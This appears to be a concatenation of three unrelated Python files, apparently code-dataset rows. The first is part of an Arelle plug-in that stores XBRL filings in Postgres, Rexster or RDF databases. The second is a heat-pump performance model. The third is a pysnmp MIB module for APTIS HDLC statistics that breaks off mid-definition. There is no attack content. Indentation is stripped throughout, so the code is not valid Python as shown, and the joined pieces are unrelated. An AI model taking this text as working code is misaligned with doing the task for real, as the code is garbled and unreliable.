def xbrlDBmenuEntender(cntlr, menu):
def storeIntoDBMenuCommand():
# save DTS menu item has been invoked
if cntlr.modelManager is None or cntlr.modelManager.modelXbrl is None:
cntlr.addToLog("No XBRL instance or taxonomy is loaded.")
return
from arelle.DialogUserPassword import askDatabase
# (user, password, host, port, database)
priorDBconnection = cntlr.config.get("xbrlDBconnection", None)
dbConnection = askDatabase(cntlr.parent, priorDBconnection)
if not dbConnection: # action cancelled
return
def backgroundStoreIntoDB():
try:
host, port, user, password, db, timeout, dbType = dbConnection
if timeout and timeout.isdigit():
timeout = int(timeout)
# identify server
if dbType in dbTypes:
insertIntoDB = dbTypes[dbType]
else:
cntlr.addToLog(_("Probing host {0} port {1} to determine server database type.")
.format(host, port))
if isPostgresPort(host, port):
dbType = "postgres"
insertIntoDB = insertIntoPostgresDB
elif isRexsterPort(host, port):
dbType = "rexster"
insertIntoDB = insertIntoRexsterDB
elif isRdfPort(host, port, db):
dbType = "rdfDB"
insertIntoDB = insertIntoRdfDB
else:
cntlr.addToLog(_("Unable to determine server type!\n ") +
_("Probing host {0} port {1} unable to determine server type.")
.format(host, port))
cntlr.config["xbrlDBconnection"] = (host, port, user, password, db, timeout, '') # forget type
cntlr.saveConfig()
return
cntlr.addToLog(_("Database type {} identified.").format(dbType))
cntlr.config["xbrlDBconnection"] = (host, port, user, password, db, timeout, dbType)
cntlr.saveConfig()
startedAt = time.time()
insertIntoDB(cntlr.modelManager.modelXbrl,
host=host, port=port, user=user, password=password, database=db, timeout=timeout)
cntlr.addToLog(format_string(cntlr.modelManager.locale,
_("stored to database in %.2f secs"),
time.time() - startedAt))
except Exception as ex:
import traceback
cntlr.addToLog(
_("[xpDB:exception] Loading XBRL DB: %(exception)s: %(error)s \n%(traceback)s") %
{"exception": ex.__class__.__name__,
"error": str(ex),
"exc_info": True,
"traceback": traceback.format_tb(sys.exc_info()[2])})
cntlr.config["xbrlDBconnection"] = (host, port, user, password, db, timeout, '') # forget type
cntlr.saveConfig()
import threading
thread = threading.Thread(target=backgroundStoreIntoDB)
thread.daemon = True
thread.start()
# Extend menu with an item for the savedts plugin
menu.add_command(label="Store to XBRL DB",
underline=0,
command=storeIntoDBMenuCommand)
# add log handler
logging.getLogger("arelle").addHandler(LogToDbHandler())
def storeIntoDB(dbConnection, modelXbrl, rssItem=None):
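    # dbConnection is a host,port,user,password,database[,timeout[,dbType]]
    # sequence, matching the --store-to-XBRL-DB connection string format.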
host = port = user = password = db = timeout = dbType = None
if isinstance(dbConnection, (list, tuple)): # variable length list
if len(dbConnection) > 0: host = dbConnection[0]
if len(dbConnection) > 1: port = dbConnection[1]
if len(dbConnection) > 2: user = dbConnection[2]
if len(dbConnection) > 3: password = dbConnection[3]
if len(dbConnection) > 4: db = dbConnection[4]
if len(dbConnection) > 5 and dbConnection[5] and dbConnection[5].isdigit():
timeout = int(dbConnection[5])
if len(dbConnection) > 6: dbType = dbConnection[6]
startedAt = time.time()
if dbType in dbTypes:
insertIntoDB = dbTypes[dbType]
elif isPostgresPort(host, port):
insertIntoDB = insertIntoPostgresDB
elif isRexsterPort(host, port):
insertIntoDB = insertIntoRexsterDB
elif isRdfPort(host, port, db):
insertIntoDB = insertIntoRdfDB
else:
        modelXbrl.modelManager.addToLog('Server at "{0}:{1}" is not recognized to be a Postgres, Rexster, or RDF service.'.format(host, port))
return
insertIntoDB(modelXbrl, host=host, port=port, user=user, password=password, database=db, timeout=timeout, rssItem=rssItem)
modelXbrl.modelManager.addToLog(format_string(modelXbrl.modelManager.locale,
_("stored to database in %.2f secs"),
time.time() - startedAt), messageCode="info", file=modelXbrl.uri)
def xbrlDBcommandLineOptionExtender(parser):
# extend command line options to import sphinx files into DTS for validation
parser.add_option("--store-to-XBRL-DB",
action="store",
dest="storeToXbrlDb",
help=_("Store into XBRL DB. "
"Provides connection string: host,port,user,password,database[,timeout[,{postgres|rexster|rdfDB}]]. "
"Autodetects database type unless 7th parameter is provided. "))
logging.getLogger("arelle").addHandler(LogToDbHandler())
def xbrlDBCommandLineXbrlLoaded(cntlr, options, modelXbrl):
from arelle.ModelDocument import Type
if modelXbrl.modelDocument.type == Type.RSSFEED and getattr(options, "storeToXbrlDb", False):
modelXbrl.xbrlDBconnection = options.storeToXbrlDb.split(",")
def xbrlDBCommandLineXbrlRun(cntlr, options, modelXbrl):
from arelle.ModelDocument import Type
if modelXbrl.modelDocument.type != Type.RSSFEED and getattr(options, "storeToXbrlDb", False):
dbConnection = options.storeToXbrlDb.split(",")
storeIntoDB(dbConnection, modelXbrl)
def xbrlDBvalidateRssItem(val, modelXbrl, rssItem):
if hasattr(val.modelXbrl, 'xbrlDBconnection'):
storeIntoDB(val.modelXbrl.xbrlDBconnection, modelXbrl, rssItem)
def xbrlDBdialogRssWatchDBconnection(*args, **kwargs):
try:
from .DialogRssWatchExtender import dialogRssWatchDBextender
dialogRssWatchDBextender(*args, **kwargs)
except ImportError:
pass
def xbrlDBdialogRssWatchValidateChoices(dialog, frame, row, options, cntlr):
from arelle.UiUtil import checkbox
dialog.checkboxes += (
checkbox(frame, 2, row,
"Store into XBRL Database",
"storeInXbrlDB"),
)
def xbrlDBrssWatchHasWatchAction(rssWatchOptions):
return rssWatchOptions.get("xbrlDBconnection") and rssWatchOptions.get("storeInXbrlDB")
def xbrlDBrssDoWatchAction(modelXbrl, rssWatchOptions, rssItem):
dbConnectionString = rssWatchOptions.get("xbrlDBconnection")
if dbConnectionString:
dbConnection = dbConnectionString.split(',')
storeIntoDB(dbConnection, modelXbrl)
class LogToDbHandler(logging.Handler):
def __init__(self):
super(LogToDbHandler, self).__init__()
self.logRecordBuffer = []
def flush(self):
del self.logRecordBuffer[:]
def dbHandlerLogEntries(self, clear=True):
entries = []
for logRec in self.logRecordBuffer:
message = { "text": self.format(logRec) }
if logRec.args:
for n, v in logRec.args.items():
message[n] = v
entry = {"code": logRec.messageCode,
"level": logRec.levelname.lower(),
"refs": logRec.refs,
"message": message}
entries.append(entry)
if clear:
del self.logRecordBuffer[:]
return entries
def emit(self, logRecord):
self.logRecordBuffer.append(logRecord)
__pluginInfo__ = {
'name': 'XBRL Database',
'version': '0.9',
'description': "This plug-in implements the XBRL Public Postgres and Abstract Model Graph Databases. ",
'license': 'Apache-2 (Arelle plug-in), BSD license (pg8000 library)',
'author': 'Mark V Systems Limited',
'copyright': '(c) Copyright 2013 Mark V Systems Limited, All rights reserved,\n'
'uses: pg8000, Copyright (c) 2007-2009, Mathieu Fenniak (XBRL Public Postgres DB), and\n'
' rdflib, Copyright (c) 2002-2012, RDFLib Team (RDF DB)',
# classes of mount points (required)
'CntlrWinMain.Menu.Tools': xbrlDBmenuEntender,
'CntlrCmdLine.Options': xbrlDBcommandLineOptionExtender,
'CntlrCmdLine.Xbrl.Loaded': xbrlDBCommandLineXbrlLoaded,
'CntlrCmdLine.Xbrl.Run': xbrlDBCommandLineXbrlRun,
'DialogRssWatch.FileChoices': xbrlDBdialogRssWatchDBconnection,
'DialogRssWatch.ValidateChoices': xbrlDBdialogRssWatchValidateChoices,
'RssWatch.HasWatchAction': xbrlDBrssWatchHasWatchAction,
'RssWatch.DoWatchAction': xbrlDBrssDoWatchAction,
'Validate.RssItem': xbrlDBvalidateRssItem
} | python |
"""Heat pump module
Modelling a heat pump with modelling approaches of
simple, lorentz, generic regression, and standard test regression
"""
import os
import math
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
import tools as t
import weather
import inputs
plt.style.use('ggplot')
plt.rcParams.update({'font.size': 22})
def perf(name, subname):
myInputs = inputs.Inputs(name, subname)
input_weather = myInputs.weather()
inputs_basics = myInputs.heatpump_basics()
modelling_approach = inputs_basics['modelling_approach']
if modelling_approach == 'Simple':
inputs_simple = myInputs.heatpump_simple()
inputs_demands = myInputs.demands()
myHeatPump = HeatPump(
inputs_basics['heat_pump_type'],
inputs_basics['modelling_approach'],
inputs_basics['capacity'],
inputs_basics['ambient_delta_t'],
inputs_basics['minimum_runtime'],
inputs_basics['minimum_output'],
inputs_basics['data_input'],
inputs_demands['source_temp'],
inputs_demands['return_temp_DH'],
input_weather,
simple_cop=inputs_simple)
return myHeatPump.performance()
elif modelling_approach == 'Lorentz':
inputs_lorentz = myInputs.heatpump_lorentz()
inputs_demands = myInputs.demands()
myHeatPump = HeatPump(
inputs_basics['heat_pump_type'],
inputs_basics['modelling_approach'],
inputs_basics['capacity'],
inputs_basics['ambient_delta_t'],
inputs_basics['minimum_runtime'],
inputs_basics['minimum_output'],
inputs_basics['data_input'],
inputs_demands['source_temp'],
inputs_demands['return_temp_DH'],
input_weather,
lorentz_inputs=inputs_lorentz)
return myHeatPump.performance()
elif modelling_approach == 'Generic regression':
inputs_demands = myInputs.demands()
myHeatPump = HeatPump(
inputs_basics['heat_pump_type'],
inputs_basics['modelling_approach'],
inputs_basics['capacity'],
inputs_basics['ambient_delta_t'],
inputs_basics['minimum_runtime'],
inputs_basics['minimum_output'],
inputs_basics['data_input'],
inputs_demands['source_temp'],
inputs_demands['return_temp_DH'],
input_weather)
return myHeatPump.performance()
elif modelling_approach == 'Standard test regression':
inputs_standard_regression = myInputs.heatpump_standard_regression()
inputs_demands = myInputs.demands()
myHeatPump = HeatPump(
inputs_basics['heat_pump_type'],
inputs_basics['modelling_approach'],
inputs_basics['capacity'],
inputs_basics['ambient_delta_t'],
inputs_basics['minimum_runtime'],
inputs_basics['minimum_output'],
inputs_basics['data_input'],
inputs_demands['source_temp'],
inputs_demands['return_temp_DH'],
input_weather,
standard_test_regression_inputs=inputs_standard_regression)
return myHeatPump.performance()
class HeatPump(object):
def __init__(self, hp_type, modelling_approach,
capacity, ambient_delta_t,
minimum_runtime, minimum_output, data_input,
flow_temp_source, return_temp,
hp_ambient_temp,
simple_cop=None,
lorentz_inputs=None,
generic_regression_inputs=None,
standard_test_regression_inputs=None
):
"""heat pump class object
Arguments:
hp_type {string} -- type of heatpump, ASHP, WSHP, GSHP
modelling_approach {str} -- simple, lorentz,
generic, standard regression
capacity {float} -- thermal capacity of heat pump
            ambient_delta_t {int} -- drop in ambient source temperature
                from inlet to outlet
            minimum_runtime {string} -- fixed or variable speed compressor
            minimum_output {float} -- minimum thermal output of the heat pump
            data_input {str} -- type of data input, peak or integrated
            flow_temp_source {dataframe} -- required temperatures out of HP
            return_temp {dataframe} -- inlet temp to HP
            hp_ambient_temp {dic} -- ambient conditions of heat source
Keyword Arguments: all these are for inputs, bar simple,
for different modelling approaches
simple_cop {float} -- only COP for simple (default: {None})
lorentz_inputs {dic} -- (default: {None})
generic_regression_inputs {dic} -- (default: {None})
standard_test_regression_inputs {dic} -- (default: {None})
"""
self.hp_type = hp_type
self.modelling_approach = modelling_approach
self.capacity = capacity
self.ambient_delta_t = ambient_delta_t
self.minimum_runtime = minimum_runtime
self.minimum_output = minimum_output
self.data_input = data_input
self.flow_temp_source = flow_temp_source
self.return_temp = return_temp
self.hp_ambient_temp = hp_ambient_temp
self.simple_cop = simple_cop
self.lorentz_inputs = lorentz_inputs
self.generic_regression_inputs = generic_regression_inputs
self.standard_test_regression_inputs = standard_test_regression_inputs
def heat_resource(self):
"""accessing the heat resource
takes the hp resource from the weather class
Returns:
dataframe -- ambient temperature for heat source of heat pump
"""
HP_resource = weather.Weather(
air_temperature=self.hp_ambient_temp['air_temperature'],
water_temperature=self.hp_ambient_temp['water_temperature']).heatpump()
if self.hp_type == 'ASHP':
HP_resource = HP_resource.rename(
columns={'air_temperature': 'ambient_temp'})
return HP_resource[['ambient_temp']]
elif self.hp_type == 'WSHP':
HP_resource = HP_resource.rename(
columns={'water_temperature': 'ambient_temp'})
return HP_resource[['ambient_temp']]
else:
print('ERROR invalid heat pump type')
def performance(self):
"""performance over year of heat pump
        gathers inputs for each timestep and calculates
        the heat pump performance (cop and duty) for that timestep
Returns:
dic -- cop and duty for each hour timestep in year
"""
if self.capacity == 0:
performance = []
for timesteps in range(8760):
# cop needs to be low to not break the mpc solver
# duty being zero means it won't choose it anyway
p = {'cop': 0.5, 'duty': 0}
performance.append(p)
return performance
ambient_temp = self.heat_resource()['ambient_temp']
if self.modelling_approach == 'Simple':
cop_x = self.simple_cop
duty_x = self.capacity
elif self.modelling_approach == 'Lorentz':
myLorentz = Lorentz(self.lorentz_inputs['cop'],
self.lorentz_inputs['flow_temp_spec'],
self.lorentz_inputs['return_temp_spec'],
self.lorentz_inputs['temp_ambient_in_spec'],
self.lorentz_inputs['temp_ambient_out_spec'],
self.lorentz_inputs['elec_capacity'])
hp_eff = myLorentz.hp_eff()
elif self.modelling_approach == 'Generic regression':
myGenericRegression = GenericRegression()
duty_x = self.capacity
elif self.modelling_approach == 'Standard test regression':
myStandardRegression = StandardTestRegression(
self.standard_test_regression_inputs['data_x'],
self.standard_test_regression_inputs['data_COSP'],
self.standard_test_regression_inputs['data_duty'])
models = myStandardRegression.train()
COP_model = models['COP_model']
duty_model = models['duty_model']
performance = []
for timestep in range(8760):
if self.modelling_approach == 'Simple':
cop = cop_x
hp_duty = duty_x
elif self.modelling_approach == 'Lorentz':
ambient_return = ambient_temp[timestep] - self.ambient_delta_t
cop = myLorentz.calc_cop(hp_eff,
self.flow_temp_source[timestep],
self.return_temp[timestep],
ambient_temp[timestep],
ambient_return)
hp_duty = myLorentz.calc_duty(self.capacity)
elif self.modelling_approach == 'Generic regression':
if self.hp_type == 'ASHP':
cop = myGenericRegression.ASHP_cop(
self.flow_temp_source[timestep],
ambient_temp[timestep])
elif self.hp_type == 'GSHP' or self.hp_type == 'WSHP':
cop = myGenericRegression.GSHP_cop(
self.flow_temp_source[timestep],
ambient_temp[timestep])
# account for defrosting below 5 drg
if ambient_temp[timestep] <= 5:
cop = 0.9 * cop
hp_duty = duty_x
elif self.modelling_approach == 'Standard test regression':
hp_duty = myStandardRegression.predict_duty(
duty_model,
ambient_temp[timestep],
self.flow_temp_source[timestep])
                # 10% reduction in performance (0.9 factor) if
                # data not collected to standard test conditions
if self.data_input == 'Integrated performance' or ambient_temp[timestep] > 5:
cop = myStandardRegression.predict_COP(
COP_model,
ambient_temp[timestep],
self.flow_temp_source[timestep])
elif self.data_input == 'Peak performance':
if self.hp_type == 'ASHP':
if ambient_temp[timestep] <= 5:
cop = 0.9 * myStandardRegression.predict_COP(
COP_model,
ambient_temp[timestep],
self.flow_temp_source[timestep])
d = {'cop': cop, 'duty': hp_duty}
performance.append(d)
return performance
def elec_usage(self, demand, hp_performance):
"""electricity usage of hp for timestep given a thermal demand
calculates the electrical usage of the heat pump given a heat demand
outputs a dataframe of heat demand, heat pump heat demand,
heat pump elec demand, cop, duty, and leftover
(only non-zero for fixed speed HP)
Arguments:
timestep {int} -- timestep to be calculated
demand {float} -- thermal demand to be met by heat pump
hp_performance {dic} -- dic containing the cop and duty
for timesteps over year
Returns:
dic -- heat demand to be met, cop, duty,
heat demand met by hp, electricity usage of heat pump
"""
if self.capacity == 0:
return {'hp_demand': 0.0, 'hp_elec': 0.0}
cop = hp_performance['cop']
duty = hp_performance['duty']
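        # electricity draw is limited by whichever binds first: the
        # electricity needed for the demand, or the ceiling implied by the duty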
max_elec_usage = demand / cop
max_elec_cap = duty / cop
hp_elec = min(max_elec_usage, max_elec_cap)
hp_demand = hp_elec * cop
d = {'hp_demand': hp_demand,
'hp_elec': hp_elec}
return d
def thermal_output(self, elec_supply,
hp_performance, heat_demand):
"""thermal output from a given electricity supply
Arguments:
timestep {int} -- timestep to be modelled
elec_supply {float} -- electricity supply used by heat pump
hp_performance {dic} -- dic containing the cop and duty
for timesteps over year
heat_demand {float} -- heat demand to be met of timestep
Returns:
dic -- max_thermal_output, heat demand met by hp,
electricity usage of heat pump
"""
if self.capacity == 0:
return {'hp_demand': 0.0, 'hp_elec': 0.0}
cop = hp_performance['cop']
duty = hp_performance['duty']
# maximum thermal output given elec supply
max_thermal_output = elec_supply * cop
# demand met by hp is min of three arguments
hp_demand = min(max_thermal_output, heat_demand, duty)
hp_elec = hp_demand / cop
d = {'hp_demand': hp_demand,
'hp_elec': hp_elec}
return d
class Lorentz(object):
def __init__(self, cop, flow_temp_spec, return_temp_spec,
ambient_temp_in_spec, ambient_temp_out_spec,
elec_capacity):
"""lorentz calculations and attributes
based on EnergyPRO method
Arguments:
cop {float} -- cop at specified conditions
flow_temp_spec {float} -- temperature from HP spec
            return_temp_spec {float} -- temperature to HP spec
            ambient_temp_in_spec {float} -- specified ambient inlet temperature
            ambient_temp_out_spec {float} -- specified ambient outlet temperature
            elec_capacity {float} -- absolute electrical capacity
"""
self.cop = cop
self.flow_temp_spec = flow_temp_spec
self.return_temp_spec = return_temp_spec
self.ambient_temp_in_spec = ambient_temp_in_spec
self.ambient_temp_out_spec = ambient_temp_out_spec
self.elec_capacity = elec_capacity
def hp_eff(self):
"""heat pump efficiency which is static
        # calculations of the lorentz model, starting with the mean temps
        # for the flow and return of the heat pump, t high mean
# and the ambient in and out temps, t low mean
Returns:
float -- efficiency of the heat pump
"""
t_high_mean = ((self.flow_temp_spec - self.return_temp_spec) /
(math.log((self.flow_temp_spec + 273.15) /
(self.return_temp_spec + 273.15))))
t_low_mean = (
(self.ambient_temp_in_spec - self.ambient_temp_out_spec) /
(math.log((self.ambient_temp_in_spec + 273.15) /
(self.ambient_temp_out_spec + 273.15))))
# lorentz cop is the highest theoretical cop
cop_lorentz = t_high_mean / (t_high_mean - t_low_mean)
# this gives the heat pump efficiency using the stated cop
        # the lorentz cop is calculated for each timestep
# then this is multiplied by the heat pump
# efficiency to give actual cop
hp_eff = self.cop / cop_lorentz
return hp_eff
def calc_cop(self, hp_eff, flow_temp, return_temp,
ambient_temp_in, ambient_temp_out):
"""cop for timestep
        calculates the cop based upon actual flow/return and ambient
uses heat pump efficiency from before
Arguments:
hp_eff {float} -- heat pump efficiency
flow_temp {float} -- flow temperature from heat pump
return_temp {float} -- temperature returning to heat pump
ambient_temp_in {float} -- real-time
ambient_temp_out {float} -- real-time
Returns:
float -- cop for timestep
"""
t_high_mean = ((flow_temp - return_temp) /
(math.log((flow_temp + 273.15) /
(return_temp + 273.15))))
t_low_mean = ((ambient_temp_in - ambient_temp_out) /
(math.log((ambient_temp_in + 273.15) /
(ambient_temp_out + 273.15))))
cop_lorentz = t_high_mean / (t_high_mean - t_low_mean)
cop = hp_eff * cop_lorentz
return cop
def calc_duty(self, capacity):
"""duty for timestep
calculates duty for timestep, ensures this is not exceeded
Arguments:
capacity {float} -- electrical capacity of heat pump
Returns:
float -- duty is the thermal output of the heat pump
"""
duty_max = self.cop * self.elec_capacity
if duty_max >= capacity:
duty = capacity
elif duty_max < capacity:
duty = duty_max
return duty
class GenericRegression(object):
"""uses generic regression analysis to predict performance
see Staffel paper on review of domestic heat pumps for coefficients
"""
def ASHP_cop(self, flow_temp, ambient_temp):
cop = (6.81 -
0.121 * (flow_temp - ambient_temp) +
0.00063 * (flow_temp - ambient_temp) ** 2
)
return cop
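    # Worked example (a sketch): a 45 degC flow temp at 7 degC ambient gives
    # cop = 6.81 - 0.121*38 + 0.00063*38**2, i.e. ~3.12 (before any defrost penalty)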
def ASHP_duty(self, flow_temp, ambient_temp):
duty = (5.80 +
0.21 * (ambient_temp)
)
return duty
def GSHP_cop(self, flow_temp, ambient_temp):
cop = (8.77 -
0.15 * (flow_temp - ambient_temp) +
0.000734 * (flow_temp - ambient_temp) ** 2
)
return cop
def GSHP_duty(self, flow_temp, ambient_temp):
duty = (9.37 +
0.30 * ambient_temp
)
return duty
def plot_cop(self):
x_ambient = np.linspace(-5, 15, num=100)
cop_55 = []
for z in range(len(x_ambient)):
c = self.ASHP_cop(55, x_ambient[z])
if x_ambient[z] <= 5:
c = 0.9 * c
cop_55.append(c)
cop_45 = []
for z in range(len(x_ambient)):
c = self.ASHP_cop(45, x_ambient[z])
if x_ambient[z] <= 5:
c = 0.9 * c
cop_45.append(c)
        plt.plot(x_ambient, cop_45, linewidth=2)
        plt.plot(x_ambient, cop_55, linewidth=2)
        plt.legend(['Flow T 45', 'Flow T 55'], loc='best')
plt.ylabel('COP')
plt.xlabel('Ambient temperature')
plt.show()
class StandardTestRegression(object):
def __init__(self, data_x, data_COSP,
data_duty, degree=2):
"""regression analysis based on standard test condition data
trains a model
predicts cop and duty
Arguments:
data_x {dataframe} -- with flow temps and ambient temps
data_COSP {dataframe} -- with cosp data for different data_X
data_duty {dataframe} -- with duty data for different data_X
Keyword Arguments:
degree {number} -- polynomial number (default: {2})
"""
self.data_x = data_x
self.data_COSP = data_COSP
self.data_duty = data_duty
self.degree = degree
def train(self):
"""training model
"""
poly = PolynomialFeatures(degree=self.degree, include_bias=False)
X_new = poly.fit_transform(self.data_x)
Y_COSP_new = poly.fit_transform(self.data_COSP)
Y_duty_new = poly.fit_transform(self.data_duty)
model_cop = LinearRegression()
model_cop.fit(X_new, Y_COSP_new)
model_duty = LinearRegression()
model_duty.fit(X_new, Y_duty_new)
return {'COP_model': model_cop, 'duty_model': model_duty}
def predict_COP(self, model, ambient_temp, flow_temp):
"""predicts COP from model
Arguments:
model {dic} -- cop and duty models in dic
ambient_temp {float} --
flow_temp {float} --
Returns:
float -- predicted COP
"""
x_pred = np.array([ambient_temp, flow_temp]).reshape(1, -1)
poly = PolynomialFeatures(degree=2, include_bias=False)
x_pred_new = poly.fit_transform(x_pred)
pred_cop = model.predict(x_pred_new)
return float(pred_cop[:, 0])
def predict_duty(self, model, ambient_temp, flow_temp):
"""predicts duty from regression model
Arguments:
model {dic} -- cop and duty models in dic
ambient_temp {float} --
flow_temp {float} --
Returns:
            float -- predicted duty
"""
x_pred = np.array([ambient_temp, flow_temp]).reshape(1, -1)
poly = PolynomialFeatures(degree=2, include_bias=False)
x_pred_new = poly.fit_transform(x_pred)
pred_duty = model.predict(x_pred_new)
return float(pred_duty[:, 0])
def graphs(self):
"""OLD testing of how to do regression analysis
includes input method, regression, graphing
"""
path = t.inputs_path()
file1 = os.path.join(path['folder_path'], "regression1.pkl")
regression1 = pd.read_pickle(file1)
path = t.inputs_path()
file1a = os.path.join(path['folder_path'], "regression_temp1.pkl")
regression_temp1 = pd.read_pickle(file1a)
        dic = {'flow_temp': [regression_temp1['flow_temp'][0]] * 8}
df = pd.DataFrame(data=dic)
data1 = pd.concat([regression1, df], axis=1)
path = t.inputs_path()
file2 = os.path.join(path['folder_path'], "regression2.pkl")
regression2 = pd.read_pickle(file2)
path = t.inputs_path()
file2a = os.path.join(path['folder_path'], "regression_temp2.pkl")
regression_temp2 = pd.read_pickle(file2a)
        dic2 = {'flow_temp': [regression_temp2['flow_temp'][0]] * 8}
df2 = pd.DataFrame(data=dic2)
data2 = pd.concat([regression2, df2], axis=1)
path = t.inputs_path()
file3 = os.path.join(path['folder_path'], "regression3.pkl")
regression3 = pd.read_pickle(file3)
path = t.inputs_path()
file3a = os.path.join(path['folder_path'], "regression_temp3.pkl")
regression_temp3 = pd.read_pickle(file3a)
        dic3 = {'flow_temp': [regression_temp3['flow_temp'][0]] * 8}
df3 = pd.DataFrame(data=dic3)
data3 = pd.concat([regression3, df3], axis=1)
path = t.inputs_path()
file4 = os.path.join(path['folder_path'], "regression4.pkl")
regression4 = pd.read_pickle(file4)
path = t.inputs_path()
file4a = os.path.join(path['folder_path'], "regression_temp4.pkl")
regression_temp4 = pd.read_pickle(file4a)
        dic4 = {'flow_temp': [regression_temp4['flow_temp'][0]] * 8}
df4 = pd.DataFrame(data=dic4)
data4 = pd.concat([regression4, df4], axis=1)
        regression_data = pd.concat([data1, data2, data3, data4])
regression_data = regression_data.dropna()
regression_data = regression_data.reset_index(drop=True)
#note that ambient temp is column1 and flow_temp is column 2
X = regression_data.drop(columns=['duty', 'capacity_percentage', 'COSP'])
Y_COSP = regression_data.drop(columns=['duty', 'capacity_percentage', 'flow_temp', 'ambient_temp'])
Y_duty = regression_data.drop(columns=['COSP', 'capacity_percentage', 'flow_temp', 'ambient_temp'])
poly = PolynomialFeatures(degree=2, include_bias=False)
X_new = poly.fit_transform(X)
Y_COSP_new = poly.fit_transform(Y_COSP)
model_cop = LinearRegression()
model_cop.fit(X_new, Y_COSP_new)
model_duty = LinearRegression()
model_duty.fit(X_new, Y_duty)
x_ambient = np.linspace(-20,20,num=100)
df1 = pd.DataFrame(data=x_ambient)
x_flow_temp = np.array([50, 55, 60, 65, 70, 75, 80])
df2 = pd.DataFrame(data=x_flow_temp)
f_t = []
am = []
for x in range(0, len(x_flow_temp)):
for y in range(0, len(x_ambient)):
f_t.append(x_flow_temp[x])
am.append(x_ambient[y])
df3 = pd.DataFrame(data=f_t)
df3 = df3.rename(columns= {0:'flow_temp'})
df4 = pd.DataFrame(data=am)
df4 = df4.rename(columns= {0:'ambient_temp'})
x_test = pd.concat([df4, df3], axis=1)
x_test_new = poly.fit_transform(x_test)
pred_cop = model_cop.predict(x_test_new)
pred_duty = model_duty.predict(x_test_new)
fileout = os.path.join(os.path.dirname(__file__), '..', 'outputs', 'heatpump', 'regression_analysis.pdf')
pp = PdfPages(fileout)
dfs = []
for x in range(0, len(df2)):
y1 = x * len(df1)
y2 = (x+1) * len(df1)
dfs.append(pred_cop[y1:y2])
fig, ax = plt.subplots()
for x in range(0, len(df2)):
ax.plot(df1, dfs[x][:,0], label = df2[0][x])
ax.legend(title = 'Flow temperatures')
ax.scatter(X['ambient_temp'], Y_COSP['COSP'])
plt.xlabel('Ambient temp')
plt.ylabel('COSP')
pp.savefig(bbox_inches='tight')
dfs2 = []
for x in range(0, len(df2)):
y1 = x * len(df1)
y2 = (x+1) * len(df1)
dfs2.append(pred_duty[y1:y2])
fig, ax = plt.subplots()
for x in range(0, len(df2)):
ax.plot(df1, dfs2[x][:,0], label = df2[0][x])
ax.legend(title = 'Flow temperatures')
ax.scatter(X['ambient_temp'], Y_duty['duty'])
plt.xlabel('Ambient temp')
plt.ylabel('duty (kW)')
pp.savefig(bbox_inches='tight')
pp.close()
return
| python |
#
# PySNMP MIB module APTIS-HDLC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/APTIS-HDLC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 11:24:33 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
aptis_generic, = mibBuilder.importSymbols("APTIS-MIB", "aptis-generic")
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsUnion, ConstraintsIntersection, ValueRangeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueRangeConstraint", "SingleValueConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ObjectIdentity, Gauge32, iso, Counter64, ModuleIdentity, IpAddress, MibIdentifier, TimeTicks, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, Unsigned32, Counter32, Bits, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "ObjectIdentity", "Gauge32", "iso", "Counter64", "ModuleIdentity", "IpAddress", "MibIdentifier", "TimeTicks", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Unsigned32", "Counter32", "Bits", "NotificationType")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
aptisHdlc = MibIdentifier((1, 3, 6, 1, 4, 1, 2637, 2, 7))
class Index(Integer32):
pass
aptisHdlcTable = MibTable((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1), )
if mibBuilder.loadTexts: aptisHdlcTable.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcTable.setDescription('These parameters represent statistics for all of the HDLC channels for a single HDLC chip. These are errors that cannot be specified on a specific HDLC channel.')
aptisHdlcEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1), ).setIndexNames((0, "APTIS-HDLC-MIB", "aptisHdlcIfIndex"))
if mibBuilder.loadTexts: aptisHdlcEntry.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcEntry.setDescription('The Parameters for the all of the HDLC connections for a specific HDLC chip.')
aptisHdlcIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 1), Index()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcIfIndex.setDescription('The ifIndex value of the corresponding ifEntry.')
aptisHdlcReceiveDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcReceiveDrops.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcReceiveDrops.setDescription('Number of HDLC frames received that were dropped.')
aptisHdlcTransmitDrops = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 3), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcTransmitDrops.setStatus('mandatory')
if mibBuilder.loadTexts: aptisHdlcTransmitDrops.setDescription('Number of HDLC frames to be transmitted that were dropped.')
aptisHdlcSysErrors = MibTableColumn((1, 3, 6, 1, 4, 1, 2637, 2, 7, 1, 1, 4), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: aptisHdlcSysErrors.setStatus('mandatory')
